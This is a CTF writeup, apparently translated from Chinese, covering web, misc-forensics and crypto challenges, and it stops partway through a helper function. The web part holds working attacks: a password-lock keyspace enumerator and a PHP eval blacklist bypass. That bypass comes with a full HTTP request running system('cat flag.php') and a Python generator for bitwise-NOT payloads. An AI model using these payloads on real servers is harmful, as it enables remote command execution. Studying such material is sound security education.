Didn't expect so many strong players to start "hiding their flags" toward the end.
Final ranking: #8
web
web sign-in
The flag is right there in the page source.
shuangyuCTF-web1
<?php
highlight_file('index.php');
// Password-lock PHP code
// A "super complex" password generator (it is not complex at all)
function generate_password($seed) {
    // initialise a few variables
    $a = 1;
    $b = 1;
    $n = $seed;
    // Fibonacci-style sequence, with a twist
    for ($i = 0; $i < $n; $i++) {
        $temp = $a + $b + $i; // the variant: the loop index is added to each term
        $a = $b;
        $b = $temp;
    }
    // the last term becomes the first half of the password
    $password_part1 = $b;
    // some more arithmetic
    $password_part2 = ($seed * $seed + $seed + 1) % 1000; // quadratic, reduced mod 1000
    // the password is both halves joined by a fixed separator
    $password = $password_part1 . '-' . $password_part2;
    return $password;
}
// check the submitted password
if (isset($_POST['password'])) {
    $user_password = $_POST['password'];
    // client IP used as the seed; % casts the string "a.b.c.d" to int, so only the first octet survives
    $seed = $_SERVER['REMOTE_ADDR'] % 100;
    $correct_password = generate_password($seed);
    if ($user_password === $correct_password) {
        echo "密码正确,网页解锁!"; // "password correct, page unlocked"
        // the flag (or some other reward) goes here
        highlight_file('flag.php');
    } else {
        echo "密码错误,请重试。"; // "wrong password, please retry"
    }
}
?>
<!-- simple HTML form -->
<!DOCTYPE html>
<html>
<head>
<title>密码锁</title>
</head>
<body>
<form method="post" action="index.php">
<label for="password">请输入密码:</label>
<input type="text" id="password" name="password">
<input type="submit" value="解锁">
</form>
</body>
</html>
The password is derived from the client IP and then checked on login.
Debug it locally with a copy of the code that prints the generated password.
Debug code:
<?php
highlight_file('index.php');
// Password-lock PHP code
// A "super complex" password generator (it is not complex at all)
function generate_password($seed) {
    // initialise a few variables
    $a = 1;
    $b = 1;
    $n = $seed;
    // Fibonacci-style sequence, with a twist
    for ($i = 0; $i < $n; $i++) {
        $temp = $a + $b + $i; // the variant: the loop index is added to each term
        $a = $b;
        $b = $temp;
    }
    // the last term becomes the first half of the password
    $password_part1 = $b;
    // some more arithmetic
    $password_part2 = ($seed * $seed + $seed + 1) % 1000; // quadratic, reduced mod 1000
    // the password is both halves joined by a fixed separator
    $password = $password_part1 . '-' . $password_part2;
    return $password;
}
// check the submitted password
if (isset($_POST['password'])) {
    $user_password = $_POST['password'];
    // put your own public IP in the string; PHP keeps only the leading number, i.e. the first octet
    $seed = "REPLACE_WITH_YOUR_IP" % 100;
    $correct_password = generate_password($seed);
    echo $correct_password; // prints the generated password
    if ($user_password === $correct_password) {
        echo "密码正确,网页解锁!"; // "password correct, page unlocked"
        // the flag (or some other reward) goes here
        highlight_file('flag.php');
    } else {
        echo "密码错误,请重试。"; // "wrong password, please retry"
    }
}
?>
Output: 10927-307密码错误,请重试。 (the generated password, printed by the echo, followed by the "wrong password" message)
# The password we need, 10927-307, is what the echo printed.
Go back to the challenge and submit it.
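The local-debug approach works, but the lock is weaker than that. PHP's `%` converts `"a.b.c.d"` to an integer by keeping the leading number, so the seed is the first octet of the client address modulo 100 and there are only 100 possible passwords. The following is an added example (not part of the original writeup): a Python port of `generate_password()` that reproduces the value printed above for seed 17 and enumerates the whole keyspace, so the lock can be opened without knowing your own IP at all.

```python
from __future__ import annotations


def generate_password(seed: int) -> str:
    """Same arithmetic as the challenge's PHP: a shifted Fibonacci plus a quadratic mod 1000."""
    a, b = 1, 1
    for i in range(seed):
        a, b = b, a + b + i          # the "variant Fibonacci" step: temp = a + b + i
    part1 = b
    part2 = (seed * seed + seed + 1) % 1000
    return f"{part1}-{part2}"


def seed_from_ip(ip: str) -> int:
    """Mirror PHP's (int)"117.25.3.4" % 100: only the leading number survives the cast."""
    first_octet = int(ip.split(".", 1)[0])
    return first_octet % 100


def all_candidate_passwords() -> list[str]:
    """Every password the server can accept, indexed by seed (first octet mod 100)."""
    return [generate_password(s) for s in range(100)]


def seed_for_password(password: str) -> int | None:
    """Given a password the server accepted, recover the seed (and thus first octet mod 100)."""
    for s, p in enumerate(all_candidate_passwords()):
        if p == password:
            return s
    return None


if __name__ == "__main__":
    # a client at 117.x.x.x gets seed 17, which is the value the debug run printed
    print(seed_from_ip("117.25.3.4"), generate_password(17))
    # the whole keyspace fits in one POST loop
    for s, pw in enumerate(all_candidate_passwords()):
        print(s, pw)
```

Because `part1` grows strictly with the seed, the 100 candidates are all distinct, so one loop of 100 POST requests is an upper bound for opening the lock from any address.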
Gscsed在线版 (Gscsed online edition)
<?php
highlight_file(__FILE__);
//error_reporting(0);
include('flag.php');
//echo 'Getting a webshell by any means or deleting system files is forbidden; offenders will be traced and bear the consequences';
$gt=$_GET['GT'];
$pt=$_POST['PT'];
$ggt=$_GET['GGT'];
$ppt=$_POST['PPT'];
$subgt=substr($flag,0,5);
$len=strlen($flag);
$subpt=substr($flag,$len-1,1);
if($pt==$subpt&&$gt==$subgt){
    echo "进入下一层吧"; // "on to the next layer"
}else{
    echo "你输啦"; // "you lose"
}
function PTplus($pts)
{
    if (preg_match('/(`|\$|a|s|e|p|require|include|phpinfo|exec|eval|systemctl|shell_exec|system)/i', $pts)) {
        return false;
    }else{
        return true;
    }
}
function GTplus($gts) {
    if(strpos($gts, '***')){
        return false;
    }else{
        return true;
    }
}
if (PTplus($ppt)&&GTplus($ggt)){
    eval($ppt);
    echo "恭喜恭喜"; // "congratulations"
}else {
    echo "再看看吧"; // "look again"
}
echo"\n";
Page output under the source on a bare visit (no parameters): 你输啦恭喜恭喜
The blacklist on PPT bans backticks, `$` and the letters a, s, e and p (so `system`, `cat`, `passthru` and friends cannot appear literally), but it leaves `~`, parentheses and bytes above 0x7F alone. The GGT check is even weaker: strpos() returns 0 when `***` is at the very start, 0 is falsy, so GGT=*** (or any value without `***`) passes; the classic `== false` versus `=== false` bug. PHP allows bytes 0x80-0xFF in identifiers, so an unquoted run of such bytes parses as a constant name; PHP 7 evaluates an undefined constant to its own name as a string, and `~` on a string flips every bit of every byte. A string holding the bitwise NOT of "system" therefore contains none of the banned letters, yet `~` turns it back into "system", and the same goes for the argument. (PHP 8 throws an Error for undefined constants, so this needs a 7.x target.) So: bypass with bitwise NOT.
POST /?GT=flag{&GGT=*** HTTP/1.1
Host: xiaoyus.cc:12831
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9
Content-Type: application/x-www-form-urlencoded
PT=}&PPT=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F)
# PPT decodes to (~"\x8C\x86\x8C\x8B\x9A\x92")(~"\x9C\x9E\x8B\xDF\x99\x93\x9E\x98\xD1\x8F\x97\x8F")
# i.e. system("cat flag.php")
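Hand-encoding the two strings is error-prone, so here is an added example (not part of the original writeup) that builds the NOT payload for any function/argument pair, checks it against the challenge's own blacklist before it is sent, and decodes a payload back into the PHP it will execute. It reproduces the PPT body from the request above exactly. One caveat: eval() parses its argument as PHP statements, so a terminating `;` is needed for the call to be a complete statement; `build_ppt(..., terminate=True)` appends it.

```python
from __future__ import annotations
import re

# The challenge's blacklist, applied to the raw (URL-decoded) bytes, case-insensitive.
BLACKLIST = re.compile(
    rb"(`|\$|a|s|e|p|require|include|phpinfo|exec|eval|systemctl|shell_exec|system)", re.I)


def php_not(s: str) -> bytes:
    """Bitwise NOT of every byte; PHP's ~ on the result yields the original string."""
    return bytes((~b) & 0xFF for b in s.encode("latin-1"))


def build_ppt(func: str, arg: str, terminate: bool = False) -> bytes:
    """Raw PHP body `(~<func>)(~<arg>)` with both operands NOT-encoded.
    terminate=True appends ';' so eval() sees a complete statement."""
    code = b"(~" + php_not(func) + b")(~" + php_not(arg) + b")"
    return code + b";" if terminate else code


def passes_filter(code: bytes) -> bool:
    """True if the server's PTplus() would accept this body."""
    return BLACKLIST.search(code) is None


def form_encode(code: bytes) -> str:
    """Percent-encode for the form body: keep ( ) ~ ; literal, hex-escape everything else."""
    return "".join(chr(b) if b in b"()~;" else f"%{b:02X}" for b in code)


def decode_ppt(code: bytes) -> str:
    """Undo the encoding so you can read what a payload will execute before sending it."""
    inner = re.findall(rb"\(~([^()]+)\)", code)
    parts = [bytes((~b) & 0xFF for b in m).decode("latin-1") for m in inner]
    return f'{parts[0]}("{parts[1]}")' if len(parts) == 2 else " ".join(parts)


if __name__ == "__main__":
    body = build_ppt("system", "cat flag.php")
    print(passes_filter(body), decode_ppt(body))
    print("PPT=" + form_encode(body))
```

The filter check runs on the raw bytes, which is what PHP sees after URL-decoding the form body, so a payload that passes here passes preg_match() on the server.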
misc
1z_recover
Opening the challenge gives a picture.
In 010 Editor the tail of the file holds a byte-reversed 50 4B 03 04 (a zip archive written backwards).
Carve that data out and reverse it with a script.
Extra:
ZIP local file header: 50 4B 03 04 14 00 09 00
// (only the first four bytes, the signature, are fixed; the rest is the version needed and the flag bits)
ZIP end-of-central-directory record: 50 4B 05 06 00 00 00 00 02 00 02 00 B4 00 00 00 68 D4 00 00 00 00
// (again only the 4-byte signature is fixed; entry counts, sizes and offsets vary per archive)
# 1.txt holds the carved tail as a hex string, as copied out of 010 Editor
with open("1.txt", "r") as f:
    data = f.read().strip()
#print(data)
# split into two-character (one byte) groups, then reverse the byte order
reversed_data = ''.join([data[i:i+2] for i in range(0, len(data), 2)][::-1])
# print the reversed result; it should now start with 504b0304
print(reversed_data)
# write it out as the archive
with open("recovered.zip", "wb") as f:
    f.write(bytes.fromhex(reversed_data))
Turn the output into a zip archive.
Archive password (I brute-forced it for over two hours with nothing; asked the author, who had forgotten to attach a file 😭)
Password: you_are_so_clever
Inside are flag.zip and a hint.
hint: "Strange, isn't this a zip?......... why so many 11s, wait, it looks like some kind of operation......"
flag.zip won't open; look at it in 010.
Obviously XOR.
XOR with 17 (decimal, i.e. 0x11): a zip is full of 0x00 bytes, and 0x00 ^ 0x11 = 0x11, which is what the hint was pointing at.
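The two byte-level repairs on this challenge (reversing the carved dump and undoing the single-byte XOR) are worth having as reusable functions. The following is an added example, not code from the original writeup: `reverse_hex_pairs()` undoes the reversed dump, `guess_xor_key()` turns the "so many 0x11" observation into an automatic key guess (the most frequent byte of a zip is almost always 0x00, so the most frequent byte of the XORed file is the key), and `is_zip()` confirms the repair by looking for the PK\x03\x04 signature at the start and the end-of-central-directory record near the end. The sample archive is constructed in memory; it is not the challenge file.

```python
from __future__ import annotations
import io
import zipfile
from collections import Counter

ZIP_LOCAL_HEADER = b"PK\x03\x04"   # 50 4B 03 04: only these 4 bytes are fixed
ZIP_EOCD = b"PK\x05\x06"           # 50 4B 05 06: end-of-central-directory signature


def reverse_hex_pairs(hexdump: str) -> bytes:
    """Parse a hex dump as bytes and reverse the byte (not nibble) order."""
    clean = "".join(hexdump.split())
    return bytes.fromhex(clean)[::-1]


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def guess_xor_key(data: bytes, expected_most_common: int = 0x00) -> int:
    """Single-byte XOR key = most frequent ciphertext byte XOR the byte expected to
    dominate the plaintext (0x00 for zips and most binary formats)."""
    most_common_byte, _ = Counter(data).most_common(1)[0]
    return most_common_byte ^ expected_most_common


def is_zip(data: bytes) -> bool:
    """Local-file-header signature first, EOCD within the last 64 KiB + 22 bytes."""
    return data.startswith(ZIP_LOCAL_HEADER) and ZIP_EOCD in data[-(0x10000 + 22):]


def repair_xored_zip(data: bytes) -> tuple[int, bytes]:
    """Guess the key, apply it, and refuse to return garbage that is not a zip."""
    key = guess_xor_key(data)
    fixed = xor_bytes(data, key)
    if not is_zip(fixed):
        raise ValueError(f"key guess 0x{key:02x} did not produce a zip")
    return key, fixed


def make_sample_zip() -> bytes:
    """Constructed sample: a tiny valid archive to test against (not challenge data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("hint.txt", "constructed sample, not the challenge data")
    return buf.getvalue()


if __name__ == "__main__":
    original = make_sample_zip()
    dump = original[::-1].hex()                      # what the carved tail looked like
    print(reverse_hex_pairs(dump) == original)       # True
    key, fixed = repair_xored_zip(xor_bytes(original, 0x11))
    print(hex(key), fixed == original)               # 0x11 True
```

If the frequency guess is wrong for some other format, pass the byte you expect to dominate as `expected_most_common` (0x20 for English text, for instance) or simply loop over all 256 keys and keep the one for which `is_zip()` holds.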
Unzip.
flag.jpg in 010 has extra data at the tail.
base64-decoding it gives: 9527
That's the key; run the keyed extraction on the jpg with it.
flag{C0n9ratu1ati0ns!_you_are_so_cool}
诗词 (Poetry)
Opening the challenge, the hint says zip archive.
Rename it to .zip.
Inside is an image; in 010 there is yet another zip appended to it.
Carve that out too.
After extracting, something is off: every file is 0 bytes.
Write a script to read their timestamps.
import os
# the 29 empty files 0.txt .. 28.txt carry the message in their timestamps
for i in range(29):
    filename = "D:\\Desktop\\s45\\45564564654\\{0}.txt".format(i)
    file_attr = os.stat(filename)              # read the file attributes
    create_time = str(file_attr.st_ctime)      # creation time on Windows (on Linux st_ctime is the inode change time)
    print(chr(int(create_time[7:10])), end='')  # characters 7..9 of the epoch = last three digits of the seconds
# This should be the intended script; the challenge itself was broken.
flag{0h!Y0u_4re_Time_M4ster!}
longpy
Open the challenge.
It's a PNG with a tampered height; fix it.
That reveals the hint: pyc.
Looking at the image again, more data is hidden inside it: pyc data.
Carve out the pyc.
Decompile the pyc to get the data.
Decode it (base64 with a custom alphabet).
Hint: Stegosaurus pyc.
A search turns up the stego tool:
CTF pyc之stegosaurus隐写_pyc隐写-CSDN博客
Decode with it.
flag{Pyc_to_stegosaurus}
看过那年的雪吗? (Have you seen that year's snow?)
It felt familiar the moment I opened it: a reused challenge.
2024_ctfshow_西瓜杯复现_647669776d757e83817372816e707479707c888789757c9278-CSDN博客
Open the file in 010.
Carve the data out into a zip archive; it isn't even encrypted.
After fixing it, get the file.
Obviously SNOW (whitespace) steganography.
That gives half the flag:
ctfshow{W1sh1ng_every0ne_4_
The rest works like the Poetry challenge:
write a timestamp-extraction script.
import os
# 11 empty files 0.txt .. 10.txt; this time the message is in the modification times
for i in range(11):
    filename = "D:\\Desktop\\过那年的雪吗\\dsffdsa\\{0}.txt".format(i)
    file_attr = os.stat(filename)              # read the file attributes
    alter_time = str(file_attr.st_mtime)       # modification time
    print(chr(int(alter_time[7:10])), end='')  # last three digits of the seconds
# key: ctfSh0w
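Both timestamp scripts (this one and the Poetry one) read the same channel: for a 10-digit epoch, `str(st_mtime)[7:10]` is the last three digits of the integer seconds, i.e. `int(st_mtime) % 1000`, and that value is a character code. The following is an added example, not from the original writeup, that implements both directions so the channel can be exercised offline: `encode_timestamps()` writes a message into the mtimes of empty files, `decode_timestamps()` reads it back with the modulo form (which does not depend on the float's string representation). Creation time cannot be set from user space portably, which is why the demo uses mtime; the `attr` parameter lets the decoder read `st_ctime` on Windows where that is the creation time. Paths and the base epoch are my assumptions.

```python
import os
import tempfile

BASE_EPOCH = 1_700_000_000  # any 10-digit epoch whose last three digits are 000


def encode_timestamps(directory: str, message: str, base: int = BASE_EPOCH) -> None:
    """Create empty 0.txt .. N-1.txt and set each file's mtime to base + ord(char)."""
    for i, ch in enumerate(message):
        if not 0 <= ord(ch) < 1000:
            raise ValueError("only code points below 1000 fit in three digits")
        path = os.path.join(directory, f"{i}.txt")
        open(path, "w").close()
        t = base + ord(ch)
        os.utime(path, (t, t))  # (atime, mtime), whole seconds


def decode_timestamps(directory: str, count: int, attr: str = "st_mtime") -> str:
    """Read attr of 0.txt .. count-1.txt; the last three digits of the seconds are the chars.
    Equivalent to the writeup's str(st)[7:10] slice for a 10-digit epoch."""
    out = []
    for i in range(count):
        st = os.stat(os.path.join(directory, f"{i}.txt"))
        seconds = int(getattr(st, attr))
        out.append(chr(seconds % 1000))
    return "".join(out)


def roundtrip(message: str) -> str:
    """Encode into a scratch directory and decode again; returns the recovered text."""
    with tempfile.TemporaryDirectory() as d:
        encode_timestamps(d, message)
        return decode_timestamps(d, len(message))


if __name__ == "__main__":
    print(roundtrip("ctfSh0w"))
```

When extracting a real archive, keep in mind that the unzip tool decides which timestamps survive: 7-Zip and Windows Explorer restore mtime, and only NTFS exposes a separate creation time, so a channel hidden in ctime only decodes on Windows.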
Use OurSecret with that key.
(Note: strip the trailing PK data from the stego image first.)
Extract the file and decrypt it.
ctfshow{W1sh1ng_every0ne_4_happy_time_pl4ying}
wu_kong
Two images are given.
Invert the colours and the flag shows right away.
flag{9ba77acb-c736-70ee-1993-0d0c2a1012ee}
1z_disk_decode
Opened it; the hint made no sense to me (the unintended route: brute-force the password, natasha,
directly).
Put the image in 010 and look.
There is a large amount of extra data at the tail of the file.
Carve it out.
This is where I got stuck: the data has no recognisable signature at all.
The author later hinted that it is some kind of disk encryption. That explains the lack of features: a VeraCrypt container has no magic bytes, its header is encrypted, so the whole blob is indistinguishable from random data.
Decrypt it with VeraCrypt.
The carved data is the encrypted volume; the keyfile is the image itself (with the extra data removed).
Mount it: inside is a jpg.
Fix the jpg's height.
flag{y0u_g0t_1t}
MoreHight
Fix the image's height.
flag{Png_hight_hight}
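Three challenges on this page (longpy, 1z_disk_decode's final image and MoreHight) come down to "fix the height": the author shrinks the height field so the bottom rows, where the flag usually sits, are never rendered. For PNG the height lives in the IHDR chunk, and a lazily edited file keeps the old chunk CRC, so a CRC check is the quickest tell, while the real row count can be recovered from the decompressed IDAT size instead of guessed. The following is an added example, not from the original writeup, that does the repair without a hex editor; the sample image is constructed in memory rather than taken from a challenge. It handles non-interlaced images only.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
_CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}   # colour type -> samples per pixel


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """length | type | body | CRC32 over type+body, as the PNG spec lays a chunk out."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def _chunks(data: bytes):
    """Yield (type, body) for every chunk after the signature."""
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        yield ctype, data[pos + 8:pos + 8 + length]
        pos += 12 + length


def make_png(width: int, height: int) -> bytes:
    """Constructed sample: a minimal 8-bit RGB, non-interlaced PNG filled with one colour."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    rows = b"".join(b"\x00" + b"\x40\x80\xC0" * width for _ in range(height))  # filter byte 0 per row
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(rows)) + _chunk(b"IEND", b""))


def ihdr_info(data: bytes) -> dict:
    """Width/height from IHDR plus whether the stored CRC still matches the chunk."""
    if not data.startswith(PNG_SIGNATURE) or data[12:16] != b"IHDR":
        raise ValueError("not a PNG with IHDR as the first chunk")
    body = data[16:29]
    stored = struct.unpack(">I", data[29:33])[0]
    width, height = struct.unpack(">II", body[:8])
    return {"width": width, "height": height,
            "crc_ok": stored == (zlib.crc32(b"IHDR" + body) & 0xFFFFFFFF)}


def set_png_height(data: bytes, height: int, fix_crc: bool = True) -> bytes:
    """Rewrite the IHDR height. fix_crc=False keeps the stale CRC, which is what a
    hastily edited challenge image looks like."""
    ihdr_info(data)  # validates the layout
    body = data[16:20] + struct.pack(">I", height) + data[24:29]
    crc = data[29:33] if not fix_crc else struct.pack(">I", zlib.crc32(b"IHDR" + body) & 0xFFFFFFFF)
    return data[:16] + body + crc + data[33:]


def true_height_from_idat(data: bytes) -> int:
    """Real row count = decompressed IDAT size / row stride, whatever IHDR claims."""
    width, _, depth, colour, _, _, interlace = struct.unpack(">IIBBBBB", data[16:29])
    if interlace:
        raise ValueError("Adam7-interlaced image: pass layout not handled here")
    stride = 1 + (width * _CHANNELS[colour] * depth + 7) // 8   # 1 filter byte + packed samples
    raw = zlib.decompress(b"".join(body for ctype, body in _chunks(data) if ctype == b"IDAT"))
    return len(raw) // stride


def restore_height(data: bytes) -> bytes:
    """The whole repair: derive the real height from IDAT and write it back with a good CRC."""
    return set_png_height(data, true_height_from_idat(data))


if __name__ == "__main__":
    original = make_png(4, 6)
    shrunk = set_png_height(original, 2, fix_crc=False)   # what a challenge hands out
    print(ihdr_info(shrunk))                               # height 2, crc_ok False: the tell
    print(true_height_from_idat(shrunk))                   # 6
    print(restore_height(shrunk) == original)              # True
```

Windows viewers ignore a bad IHDR CRC, which is why such images open at all; libpng-based tools refuse them, so when a PNG "won't open on Linux" this check is the first thing to run. For JPEG the height is in the SOF0 segment and there is no CRC, so only the manual edit applies there.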
海尔之眼 (Eye of Haier)
Two images are given.
The jpg has extra data after its end marker; carve it out and prepend a zip header, and it's a password-protected archive. So go look at the png.
(That took two days 😭)
Faintly visible in it: key 15740
Decode with SilentEye using that key.
flag{h@r_X4_Ya2}
FindSeed_MC
Just connect to the server and cheat.
😁
The mods used:
flag{5880616f80d73e086ec577d7ad21ef99}
crypto
At
The challenge text.
Obviously a kaomoji (emoticon) cipher (颜文字解密颜文字加密 - 萌研社 - PcMoe!).
Run the result through 随波逐流 (the all-in-one decoder); it comes out as Atbash.
flag{Ni_h@O_A!!!}
shuangyuCTF-AES & Base
The attachment:
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
# libraries you may need
# You have received a ciphertext encrypted with AES-CBC and know part of the key derivation:
# the first 8 bytes of the key are fixed; the last 8 bytes are the first 8 bytes of the SHA-256 of
# a fixed prefix (e.g. secret_) followed by the last three digits (000-999) of a secret string.
# Your task: write a Python script that tries every three-digit combination,
# finds the correct key, decrypts the ciphertext and recovers the flag.
# fixed first 8 bytes of the key
fixed_key_part = b'fixedpart'[:8]
# prefix of the secret string
secret_prefix = b'secret_'
# base64-encoded IV and ciphertext
encoded_data = '[lg/hfCVaU7OGl11oy7JsUzozFojJSjBmYt6BGY+sO/KCKkQxdXzHjiJP1AM0eoTH]'
# ----write your solution here and get the flag---------
Just continue the script:
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
# fixed first 8 bytes of the key
fixed_key_part = b'fixedpart'[:8]
# prefix of the secret string
secret_prefix = b'secret_'
# base64-encoded IV and ciphertext
encoded_data = '[lg/hfCVaU7OGl11oy7JsUzozFojJSjBmYt6BGY+sO/KCKkQxdXzHjiJP1AM0eoTH]'
# decode the base64 and split off the IV; the square brackets are not base64
# characters and b64decode() discards them by default (validate=False)
decoded_data = base64.b64decode(encoded_data)
iv = decoded_data[:16]            # first 16 bytes are the IV
ciphertext = decoded_data[16:]    # the rest is the ciphertext (32 bytes = two blocks)
# try every suffix 000..999
for i in range(1000):
    # three-digit suffix as bytes ('000', '001', ..., '999')
    suffix = f'{i:03}'.encode()
    # SHA-256 of prefix + suffix, first 8 bytes
    secret_key_part = hashlib.sha256(secret_prefix + suffix).digest()[:8]
    # fixed 8 bytes + derived 8 bytes = the 16-byte AES key
    key = fixed_key_part + secret_key_part
    # AES-CBC decryption with the candidate key
    cipher = AES.new(key, AES.MODE_CBC, iv)
    try:
        # decrypt and strip PKCS#7 padding; a wrong key almost always fails here
        plaintext = unpad(cipher.decrypt(ciphertext), AES.block_size)
        # about 1 in 256 wrong keys still yields valid-looking padding, so also
        # require the 'flag' marker before accepting the result
        if b'flag' in plaintext:
            print(f"Found key: {key.hex()}")
            print(f"Decrypted flag: {plaintext.decode('utf-8')}")
            break
    except (ValueError, KeyError):
        # padding error: not this key, move on
        continue
# Found key: 6669786564706172bccfe0b37c0a147f
# Decrypted flag: flag{Crypto_shuangyuSec_@2024}
shuangyuCTF-XOR
The challenge:
def xor_encrypt(data, key):
    encrypted_data = bytearray()
    for char in data:
        encrypted_data.append(ord(char) ^ key)
    return encrypted_data.hex()  # the hex string is the encrypted result
# Below is a hex string produced by this function:
encrypted_string = '7a6f796973746865666c6167'
# The key used for encryption is 13 (note: this is just an example; real challenges may use other keys)
key=13
# Your task: decrypt the hex string, find the hidden message, and format it as flag{*}
# Output your answer as print(f"flag{{{your_decrypted_message}}}") to get the flag
# Print the decrypted result, and mind the format ~.~
XOR is its own inverse, so just run it backwards.
Decryption script:
def xor_decrypt(encrypted_data, key):
    decrypted_data = bytearray()
    # two hex characters per byte; XOR with the same key undoes the encryption
    for i in range(0, len(encrypted_data), 2):
        byte = int(encrypted_data[i:i+2], 16)
        decrypted_data.append(byte ^ key)
    return decrypted_data.decode()
# the encrypted hex string
encrypted_hex_string = '7a6f796973746865666c6167'
# the key
key = 13
# decrypt
decrypted_bytes = xor_decrypt(encrypted_hex_string, key)
# format the output
print(f"flag{{{decrypted_bytes}}}")
# flag{wbtd~yehkalj}
Base签到 (Base sign-in)
flag{baibai_CTF_685Xiaoyu}
你真的喜欢CTF吗? (Do you really like CTF?)
Ciphertext:
AABABAAAAAABABBAABBAAAABBABBBABBAAAABBBABABAAABABBABAAAABABAAABAAAAABABAABBAABAB ——辰
Bacon cipher at a glance (A/B groups of five, 26-letter variant): it decodes to FALGDOYOULIKECTF. The final flag format turned out to be a guessing game (capital F, the rest lowercase, the "falg" typo kept as decoded) and took ages.
Flag{falgdoyoulikectf}
没有key (No key)
Ciphertext:
UH6G2CXOVIYRJI2PXMPHVFXXWWYRRH2AXMNIZF2JXAYRBEFYWWSQRF2FWAYRBAXYXEWIPIXSWOARFIEFXMRIZFFXWASSTIFCXIOIZFFHTWWH6EFTYWSR2F2FVIPRLGFYWDMSTIXSVEYRJJPYXMPHVGXXWWUGRH2YXMTSHF2HTWWIFIXOWWTRBZFGVIYRZJFWWWWIBAPIVAYRJIOFXSRIZEFXWWRHJIFKVISH4FXDXAWIXIXTXMSIDF2JVIPRDEFXTVMSPGXJWAURJGOFXMUHXEFBWWYGRIPAXMQSZFXVXAYRJIXYTISIRH2AWAQRZJFXWESIZD2JWEURJGWFXAOHZGF2WSPSTIFSVEPRZFEFVAXRJIXXYWSIVD2HX5XGRHXWXMSIVG2JWWSRJF2GXEUHXEOIWSYGRIXIXMQSHF2QVAYSBIXXWMSSBZFFXIXHZJFYXOWIZI2IVEQRHZFGXWRIZD2JWAWIHIXGXHMR2FXJWAXHFIFXXWSRHF2BWIPHLAXWX4MSTG2SVMSRFGXYXWQHZGPBWSXGRH2AVMOIZF2BWAXHXIPVWWSRHH2KWIXHVIFYXEWIVI2SWMWRFEFQWMQHZJFEWATITH2KVIPR4FFGTWWITIXTWWSRBH2FTWXHBGFYYOWITAPSVAARFIEFXMYIXEFXWWWITH2AXMRRHF2ZXAWSXEXXXWSRZZFJWIQRRGFYWESIVE2RVEURHHMFXSYHXEFXWWRSTHFCVITRHF2LWAWH2EFRXMRIXJFIV5QRFGFXW5WITGXJVMSRJIPYXWYHXGFJWSYHJIXUVMASXF2XWAURFIXQTISIVZFIX5PHZIFUVAWIZH2IWWSRBI2YXARHVJFIWAZSTIFUVIOH4FFGXAWHJIFTWMSIVZFGXIPHVHFXXISIRF2JWWSRHFFGX42RXEPBWAXQRH2MXIQSHFFZXAYRBEFZWMSRXH2GXIQRVJFYXOSIZEXRWIQRHIFPXESIXE2XWAXRTIPCVIQRHFFKWAWR2EF2YSSHJH2GXSXHTAXYXHMSPFXJVMYRHH2XXWYHXFFBWSWIRHMHXIOIHFXVXAYRBEFSVMSQRD2GWAPGRGXYXEOIBI2SWOQRHIEFXMPHZFFBWASITIFAVITQXFXFTWXIPEFTXMQHVF2JTWPHJGFYWDMSTFXRWMARFGPQXMYIXGPTWWASTGXYXMSSRF2ZVAYSBEXVTIRIBZFGVAQSHFXUWWSH4JXSVD2HFIWFXAVIXEXXWEPITHEFVISRHE2TXAWGVEXUYWRHDH2IV5QRBFFXTWWIRF2JWIURJH2PXMXHXEPBWSQRTGFCXMSRHFFXXAYIXEXZXMSSBH2AWIPHZFFYVISIRF2JV5URJEWFXAPHZEP2WATRTIFUXITRHFFCTWWHJIXRYWSIVD2KXAPHLJFWV5SIRE2JWWORLFPGXAXIXF2BWWYGRIXKXIPSHF2UWAWR6IFYWWQIXF2GWIYRRIFYWWWIVI2SVMURHIFFXASHZJFMWWPSTIFGVIUSHFFTTWYRXIFPXWSHLH2KWIPHLIFXXDMSXAFSVMARHGXQXWSIXF2XWEYRJH2AVMOIHF2JTWXIBIXUWMSR6D2HWIXHDFFYWDMSPIXSWMARFEXYXWQHZJFAWASITHFKXISIZFFITWXIFIXTWWSHBH2JX5PHJFFUV5SITIXTVIYRFIFGXIYHXE2BWWWGRHFAXMQHHF2HTWWSXIXSXMRQXFFDTWXQZIXV
Decode chain (rot13, then base32-decode and reverse ten times over, then rot13 again):
rot13->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->base32->reverse->rot13
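Peeling twenty-two layers by hand in a web decoder is where mistakes creep in, so here is the chain above as code. This is an added example, not part of the original writeup: `decode_layers()` applies exactly the listed sequence, and `encode_layers()` is its inverse, included only so a constructed ciphertext can be generated and the round trip checked offline (the challenge's own ciphertext is not embedded here).

```python
import base64
import codecs

ROUNDS = 10  # number of (base32 -> reverse) pairs between the two rot13 layers


def rot13(s: str) -> str:
    return codecs.encode(s, "rot_13")


def decode_layers(ciphertext: str, rounds: int = ROUNDS) -> str:
    """rot13, then `rounds` times: base32-decode and reverse the result, then rot13."""
    s = rot13(ciphertext)
    for _ in range(rounds):
        s = base64.b32decode(s).decode()[::-1]
    return rot13(s)


def encode_layers(plaintext: str, rounds: int = ROUNDS) -> str:
    """Inverse of decode_layers(): rot13, then `rounds` times reverse and base32-encode, then rot13."""
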